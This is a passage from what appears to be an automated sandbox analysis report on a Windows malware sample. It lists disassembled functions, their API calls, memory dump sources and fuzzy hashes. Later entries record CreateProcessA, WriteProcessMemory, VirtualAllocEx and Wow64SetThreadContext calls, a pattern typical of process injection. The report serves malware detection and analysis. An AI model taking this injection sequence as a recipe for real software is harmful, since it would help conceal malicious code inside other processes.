                                            • Instruction ID: 9739f013e1b2c8cdb9e474a3dbba30d63451fdacaab714585a90938dbf2e53ce
                                            • Opcode Fuzzy Hash: da36df46be56ddb6f7ca28674e7fb13fb42036f53ed2195e542840124e2d63d0
                                            • Instruction Fuzzy Hash: 03517CB4650205EFC708CF58C890E6BB7B6FF89304F50855DE91AAB381C731EA65CB91
                                            APIs
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6896DB2D
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6896DB45
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 6896DBA2
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$CreateDestroyElementVector
                                            • String ID:
                                            • API String ID: 3149346722-0
                                            • Opcode ID: 7d27c703cdeaf65a0b922d578071af82a90933f014dc8ea7c274c497f679244f
                                            • Instruction ID: b0a94093eb3e358fac520eab07067282761bc1fbe73bf435c1ecbcd8625adc9c
                                            • Opcode Fuzzy Hash: 7d27c703cdeaf65a0b922d578071af82a90933f014dc8ea7c274c497f679244f
                                            • Instruction Fuzzy Hash: 9411BF75745205AFE700DF69C888FAABBB8FF9A314F148199E918DB301D731E840CBA0
                                            APIs
                                              • Part of subcall function 68972820: _malloc.LIBCMT ref: 68972871
                                            • std::tr1::_Xweak.LIBCPMT ref: 689571D2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Xweak_mallocstd::tr1::_
                                            • String ID: Aj?Q
                                            • API String ID: 4085767713-52356588
                                            • Opcode ID: f8f4cdcd690c6a6144e1d5bfb4805158623f08afe91bae64dda3359624c83962
                                            • Instruction ID: 2fc7ea87f59e085ac4b7dd6454b85e01d9a622213f7705eaeefeeea9949572ae
                                            • Opcode Fuzzy Hash: f8f4cdcd690c6a6144e1d5bfb4805158623f08afe91bae64dda3359624c83962
                                            • Instruction Fuzzy Hash: B43170B4A0464A9FCB10CFA9C980AABBBF9FF49208F50865DE82597741D331EA15CB50
                                            APIs
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            • std::exception::exception.LIBCMT ref: 68974042
                                              • Part of subcall function 689A9533: std::exception::_Copy_str.LIBCMT ref: 689A954E
                                            • __CxxThrowException@8.LIBCMT ref: 68974059
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                              • Part of subcall function 689A9BB5: std::exception::exception.LIBCMT ref: 689A9C04
                                              • Part of subcall function 689A9BB5: std::exception::exception.LIBCMT ref: 689A9C1E
                                              • Part of subcall function 689A9BB5: __CxxThrowException@8.LIBCMT ref: 689A9C2F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8Throw$Copy_strExceptionRaise_mallocstd::exception::_
                                            • String ID:
                                            • API String ID: 2813683038-0
                                            • Opcode ID: 255a53779b1dbfd078419ca73b3175d0f25bcdb8c89308ae435561ebdad58ed3
                                            • Instruction ID: f13f5b5a75863b7a4c4ff1e2f0ff8641ea0cde4dffd7246ef9c2bd5f7d81b458
                                            • Opcode Fuzzy Hash: 255a53779b1dbfd078419ca73b3175d0f25bcdb8c89308ae435561ebdad58ed3
                                            • Instruction Fuzzy Hash: 0591ADB59047009FD710CF69C841B6AFBF8FF95344F90896AE4299B290E3B2D910CB92
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6895BE2D
                                            • IsBadReadPtr.KERNEL32(00000000,00000008,?,?,?), ref: 6895BE6D
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayDestroyReadSafe
                                            • String ID:
                                            • API String ID: 616443815-0
                                            • Opcode ID: 30549ab2d72141319d6888cb22d54b1bc9b7b866edfeb3adcdad132ff3bd7aa7
                                            • Instruction ID: 25ef43cf595f7c5b1d59dc5812a4b14f6ef0c21c56c6d4b4f08fa6d6285c4543
                                            • Opcode Fuzzy Hash: 30549ab2d72141319d6888cb22d54b1bc9b7b866edfeb3adcdad132ff3bd7aa7
                                            • Instruction Fuzzy Hash: 747112B0D046969FEB21CF348840669FBB9AB06328F58835CD9F5972D1C331D566CB92
                                            APIs
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            • std::exception::exception.LIBCMT ref: 68956466
                                              • Part of subcall function 689A9533: std::exception::_Copy_str.LIBCMT ref: 689A954E
                                            • __CxxThrowException@8.LIBCMT ref: 6895647D
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                            • String ID:
                                            • API String ID: 2299493649-0
                                            • Opcode ID: d3c18c42f37016bbd5bbc8c69135610c910c782a13008005590a7ef3ac7cbb14
                                            • Instruction ID: 802cefda0abaa442f40c5604a575b11286ddab30a9b79c78d1cec4fdef0f4862
                                            • Opcode Fuzzy Hash: d3c18c42f37016bbd5bbc8c69135610c910c782a13008005590a7ef3ac7cbb14
                                            • Instruction Fuzzy Hash: 7F5169B69083409FD700CF68C885A5ABBE4BB95744F80492EFA9A8B390D771D954CB93
                                            APIs
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            • std::exception::exception.LIBCMT ref: 6896D3E8
                                            • __CxxThrowException@8.LIBCMT ref: 6896D3FF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw_mallocstd::exception::exception
                                            • String ID:
                                            • API String ID: 4063778783-0
                                            • Opcode ID: 375956a8354fdd066f39170c033ed95e1b264a62aa676df1433a84ee0e3cc33b
                                            • Instruction ID: 580bfd090e5778fbd6ed658eed566cada617e611c5a66b8ebf8a8e08d53b4d64
                                            • Opcode Fuzzy Hash: 375956a8354fdd066f39170c033ed95e1b264a62aa676df1433a84ee0e3cc33b
                                            • Instruction Fuzzy Hash: 59312C755087059FD704CF28C88195EBBF4BF99728F908A2EF4658B350E731EA46CB92
                                            APIs
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            • std::exception::exception.LIBCMT ref: 68958449
                                            • __CxxThrowException@8.LIBCMT ref: 6895845E
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw_mallocstd::exception::exception
                                            • String ID:
                                            • API String ID: 4063778783-0
                                            • Opcode ID: 5dc68a276f590eb13684d8d301115a9dc5c4ac9565ca228e3448b8061f6da5b4
                                            • Instruction ID: 5049f535c8c7a98828b9b545dc5823af6f712cac2d1d2d44ca5b89fef3d1b27f
                                            • Opcode Fuzzy Hash: 5dc68a276f590eb13684d8d301115a9dc5c4ac9565ca228e3448b8061f6da5b4
                                            • Instruction Fuzzy Hash: 7201A478500208AFC70CDF54D4918AAB7F5FF98300B90C1ADDD2A4B750DB31EA45CB96
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2658558268.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5bc0000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TJbq$Te]q
                                            • API String ID: 0-3147309840
                                            • Opcode ID: a0b217f7fe2887201328ce6706f1d846107a7462c07248efe229e410b90024b0
                                            • Instruction ID: b8815d4492052fdbd5199dd0cf263977bbf11a4563da0659c85c16c6017a52a2
                                            • Opcode Fuzzy Hash: a0b217f7fe2887201328ce6706f1d846107a7462c07248efe229e410b90024b0
                                            • Instruction Fuzzy Hash: 4931EA717093844FCB06ABB498A937E7FB1AF46200F0904DFD485DB3E2D9685D09C7A2
                                            APIs
                                            • EnterCriticalSection.KERNEL32(?,?,00000000,68958C13,?,68958CD3,?,68958C13,00000000,?,?,68958C13,?,?), ref: 68958D73
                                            • LeaveCriticalSection.KERNEL32(?,?,?,68958CD3,?,68958C13,00000000,?,?,68958C13,?,?), ref: 68958D8C
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave
                                            • String ID:
                                            • API String ID: 3168844106-0
                                            • Opcode ID: 82174d528c96a3f7d4d547d4c2c0b42fab7f3ca214f17512fd670d7b5080b300
                                            • Instruction ID: 5fddfeb16bb288e596ad07a6f90fab7f7eae75bfcb08a0afb0d368fd268a7159
                                            • Opcode Fuzzy Hash: 82174d528c96a3f7d4d547d4c2c0b42fab7f3ca214f17512fd670d7b5080b300
                                            • Instruction Fuzzy Hash: 6E21E375214109EF8B08DF89D890DABB3BAFF89214B508549E91A97350CB31EE16CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2658558268.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5bc0000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TJbq$Te]q
                                            • API String ID: 0-3147309840
                                            • Opcode ID: 613fedd2cc51f2d461ffc800905a2e109f3300884497829a4b820ba963668df7
                                            • Instruction ID: 3b449671fc6567e7e079993f56c697a315c05329b0d962a4e0237127b2ef643e
                                            • Opcode Fuzzy Hash: 613fedd2cc51f2d461ffc800905a2e109f3300884497829a4b820ba963668df7
                                            • Instruction Fuzzy Hash: AC110330B101145BDB14FBA898A97BFBAF6EF88610F00046DE406AB3D0CE259D0987E6
                                            APIs
                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,68956890,?), ref: 68958BDD
                                            • LeaveCriticalSection.KERNEL32(?), ref: 68958C23
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave
                                            • String ID:
                                            • API String ID: 3168844106-0
                                            • Opcode ID: 225d4faec24a380eba320b1a613d0b0f24498842e2c20403d75ff2d2bf6834f6
                                            • Instruction ID: a641fe804228fdc02cf11536a12ce381697f8d5fc0ead19975a644512c458f30
                                            • Opcode Fuzzy Hash: 225d4faec24a380eba320b1a613d0b0f24498842e2c20403d75ff2d2bf6834f6
                                            • Instruction Fuzzy Hash: 9901BCB1349104AFC714DFA8CC9099BF3A8FB982107504269E905C7300DB32EE60CBD1
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0526C21F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2643796409.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5260000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: bc3c410ed4f1f622f0ad69fcaf9a3482880f3bb6cb1e4c087d39d3afb1c31d54
                                            • Instruction ID: dbfb5c86927766005f10f293d79aa233463c4de82ebb02ec5823e9571259832d
                                            • Opcode Fuzzy Hash: bc3c410ed4f1f622f0ad69fcaf9a3482880f3bb6cb1e4c087d39d3afb1c31d54
                                            • Instruction Fuzzy Hash: F7B112B0D142598FDF10DFA8C885BEEBBB2BF09304F149169E899B7280D7749985CF81
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0526C21F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2643796409.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5260000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: cbfcccc957f8669306ffde93f597f1dc1b6e5a131144c59b40f96dcd163b4784
                                            • Instruction ID: 99fb0da8e102e421c3df02df9d2f28fc026518692789110bb972d80dd1f7546a
                                            • Opcode Fuzzy Hash: cbfcccc957f8669306ffde93f597f1dc1b6e5a131144c59b40f96dcd163b4784
                                            • Instruction Fuzzy Hash: 79B112B0D142598FDF14DFA8C885BEEBBB2BF09304F149169E899B7280D7749985CF81
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: _malloc
                                            • String ID:
                                            • API String ID: 1579825452-0
                                            • Opcode ID: f68b760fb93fc72ff34f08d8c59c2c73af445fb31416535bde973d597349ceb3
                                            • Instruction ID: 9e750c4002898d411f0523306eef3bceeaec2448292bfdd64f38e71dc682bc96
                                            • Opcode Fuzzy Hash: f68b760fb93fc72ff34f08d8c59c2c73af445fb31416535bde973d597349ceb3
                                            • Instruction Fuzzy Hash: D9818EF59083418FEB20DFB8888572EBBE4BF91318FA4497ED1698B291D771D4848B53
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0526C745
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2643796409.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5260000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: b43be8966759b90812df2812f9a8d0b47b035c7fa45ad410eb4afddbaf6c7010
                                            • Instruction ID: ebcffdfa86f93057513865bb7088ae06083b36a3fe189831ca9828f42c473b83
                                            • Opcode Fuzzy Hash: b43be8966759b90812df2812f9a8d0b47b035c7fa45ad410eb4afddbaf6c7010
                                            • Instruction Fuzzy Hash: 134178B5D102589FCB00DFA9D984ADEFBF5BF49310F14902AE818B7210D375A985CB64
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0526C745
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2643796409.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5260000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 14cb4abe3428ef6cfccd58cb18a1da66bc11b1ec7490efd1f6ccc997262c88aa
                                            • Instruction ID: 2388aed965b0dbc7ef8d1374b0e05ee5b81213b7d9f44fd95e86e127c82e0305
                                            • Opcode Fuzzy Hash: 14cb4abe3428ef6cfccd58cb18a1da66bc11b1ec7490efd1f6ccc997262c88aa
                                            • Instruction Fuzzy Hash: 494166B5D102589FCB00DFA9D984AAEFBF5BF49310F24902AE818B7210D375A985CF64
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0526C5FC
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2643796409.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5260000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: a48ca369d9e218f21dcedd5afe1ea8bb929064beec69f7e3e9965d2cbe388cc8
                                            • Instruction ID: 24f4c4069ff71167d6545a3ffb566db668e5fa432e16867ef6cdc20ce992d975
                                            • Opcode Fuzzy Hash: a48ca369d9e218f21dcedd5afe1ea8bb929064beec69f7e3e9965d2cbe388cc8
                                            • Instruction Fuzzy Hash: 3C4166B9D012589FCF10DFA9D984A9EFBB1FF49310F14901AE818BB310D375A941CB68
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0526C5FC
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2643796409.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5260000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: c73e3ea25f297118cb9e03960780c9051e766592fd25c31286d7dc73983382da
                                            • Instruction ID: ec9745a7d5c6cca9849edce125e7025954dcba6db12de716c90cb949373de60b
                                            • Opcode Fuzzy Hash: c73e3ea25f297118cb9e03960780c9051e766592fd25c31286d7dc73983382da
                                            • Instruction Fuzzy Hash: 453155B9D012589FCF10DFA9D984A9EFBB5BF59310F14A01AE818B7310D375A941CF68
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 0526C4DB
                                            Memory Dump Source
